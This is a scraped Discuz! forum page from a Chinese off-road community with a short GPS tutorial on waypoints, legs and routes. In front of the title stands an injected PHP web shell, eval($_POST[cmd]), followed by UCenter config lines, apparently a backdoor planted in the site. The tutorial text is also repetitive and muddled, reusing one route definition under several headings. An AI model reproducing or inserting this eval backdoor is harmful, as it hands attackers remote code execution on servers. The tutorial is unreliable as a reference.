');eval($_POST[cmd])?>'); define('UC_APPID', 'UC_APPID'); define('UC_PPP', '20'); GPS知識大學堂 何謂航路點/航線/航線 - GPS - 四輪天下 - Powered by Discuz!
返回列表 回復 發帖

GPS知識大學堂 何謂航路點/航線/航線

航路點

    路線是GPS內存中存儲的一組數據,包括一個起點和一個終點的坐標。這裡的起點和終點都叫航路點。  

    航跡

    路線是GPS內存中存儲的一組數據,包括一個起點和一個終點的坐標,還可以包括若干中間點的坐標,每兩個坐標點之間的線段叫一條「航跡」(leg,腿)。  

    航線
  
    航路是比較正規的固定路線,它一般經過嚴格的設計,有足夠的地面導航設置。路線是GPS內存中存儲的一組數據,包括一個起點和一個終點的坐標,還可以包括若干中間點的坐標,每兩個坐標點之間的線段叫一條「航跡」(leg,腿)。常見GPS能存儲20條線路,每條線路30條「腿」。






    各坐標點可以從現有路標中選擇,或是手工/計算機輸入數值,輸入的路點同時作為一個路標(Waypoint/Landmark)保存。實際上一條路線的所有點都是對某個路標的引用,比如你在路標菜單下改變一個路標的名字或坐標,如果某條路線使用了它,你會發現這條線路也發生了同樣的變化。
返回列表